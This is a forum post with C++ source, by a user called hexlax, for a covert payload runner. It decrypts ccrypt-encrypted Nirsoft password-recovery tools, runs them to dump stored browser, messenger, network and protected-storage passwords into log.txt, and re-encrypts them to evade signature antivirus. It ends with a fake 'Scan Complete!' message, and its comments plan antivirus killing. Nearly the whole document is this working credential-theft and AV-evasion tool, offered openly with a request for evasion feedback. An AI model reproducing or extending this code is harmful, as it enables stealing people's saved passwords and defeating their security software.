Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature-based AVs (please provide feedback), once they are run, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.
/*
* AUTHOR: hexlax
*
* The encryption handling of this program is done. Please
* give me feedback if any AVs catch it.
*
* Command line options for final product(not implemented now):
* a) -q quiet mode, nothing displays to screen
* b) -f force run anyways
* i) if local admin privs not present
* ii) if AV is detected and forced stop failed
* iii) Places payload in danger of AV removal
* c) -c config file path [optional - default presumed]
* i) payload list
* ii) utilities list (ccrypt, pskill, etc.)
* d) -k only attempt to kill AV, no payload run
*
* The final product should be scalable enough for a user
* to add/delete/modify the payload by editing the config file.
*
*/
#include "stdafx.h"
#include <iostream>
#include <string>
#include <stdlib.h>
using namespace std;
//global constants
//Both values are compiled in; the TODOs say they are intended to come from a config file later.
//Directory handed to "ccrypt -r" by decrypt()/encrypt(); also prepended to each tool name in run_payload().
const string PAYLOAD_FILEPATH = "tools"; //TODO: insert user pref from config file.
//Key placed on the ccrypt command line via -K in decrypt()/encrypt().
const string ENC_KEY = "hexlax@hak5"; //TODO: insert user pref from config file.
//Runs "ccrypt -d -K <ENC_KEY> -r <PAYLOAD_FILEPATH>" through system().
//The key and the directory are concatenated into the shell command string, so the key
//text is part of the spawned ccrypt process's command line.
//The return value of system() is discarded: a failing or absent ccrypt is not reported.
//The trailing "n" in the message reads as an extraction-mangled "\n"; as written no newline is printed.
void decrypt()
{
cout << "Decrypting payload...n";
string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;
system(syscall.c_str());
return;
}
//Runs "ccrypt -e -K <ENC_KEY> -q -r <PAYLOAD_FILEPATH>" through system() to re-encrypt
//the payload directory in place. Unlike decrypt(), this passes -q to ccrypt.
//As in decrypt(), the key is part of the spawned process's command line and the
//return value of system() is not checked.
//The trailing "n" in the message reads as an extraction-mangled "\n".
void encrypt(){
cout << "Encrypting payload back...n";
string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;
system(syscall.c_str());
return;
}
//Runs the four Nirsoft utilities named in the post's preamble one after another, each
//via system() with "/stext <name>.tmp". The .tmp files land in the current working
//directory and are consumed later by cleanup_temps().
//Each command string is PAYLOAD_FILEPATH immediately followed by the tool name.
//Return values from system() are not checked, so a tool that fails to start is not reported.
void run_payload(){
string syscall;
cout << "Running Payload:";
//IEPV.EXE
cout << ".PSPV.."; //progress label says PSPV here, but the command below runs iepv
syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp";
system(syscall.c_str());
//MSPASS.EXE
cout << ".MSPASS...";
syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp";
system(syscall.c_str());
//NETPASS.EXE
cout << ".NETPASS..";
syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp";
system(syscall.c_str());
//PSPV.EXE
cout << ".PSPV..";
syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp";
system(syscall.c_str());
//END PAYLOAD
cout << "n"; //reads as an extraction-mangled "\n"
return;
}
//Appends the four .tmp outputs to log.txt using "type ... >> log.txt". Because ">>" appends,
//log.txt accumulates across runs and is left on disk in the working directory.
//Afterwards "del *.tmp" removes every .tmp file in the working directory, not only the
//four written by run_payload(). Each step is a separate system() call whose return value is discarded.
void cleanup_temps(){
string syscall = "";
cout << "Cleaning up...n"; //trailing "n" reads as an extraction-mangled "\n"
//consolidate our tmp files in to one
//TODO: implement the user's preference here for a
//file name & program list from config file
//TODO: after list file is done, use a for statement for cleaner code
cout << "Saving output to log.txt...n";
syscall = "type iepv.tmp >> log.txt";
system(syscall.c_str());
syscall = "type mspass.tmp >> log.txt";
system(syscall.c_str());
syscall = "type netpass.tmp >> log.txt";
system(syscall.c_str());
syscall = "type pspv.tmp >> log.txt";
system(syscall.c_str());
//get rid of *.tmp files
cout << "Removing temp files...n";
syscall = "del *.tmp"; //wildcard: matches any .tmp in the working directory
system(syscall.c_str());
}
//Entry point. Fixed sequence: decrypt the payload directory, run the tools, re-encrypt
//the directory, then consolidate and delete the .tmp files. No command-line options are
//parsed (the header comment lists them as not yet implemented). Always returns 0, since
//none of the called functions report failure.
int main(){
decrypt();
run_payload();
encrypt();
cleanup_temps();
cout << "Scan Complete!n"; //trailing "n" reads as an extraction-mangled "\n"
return 0;
}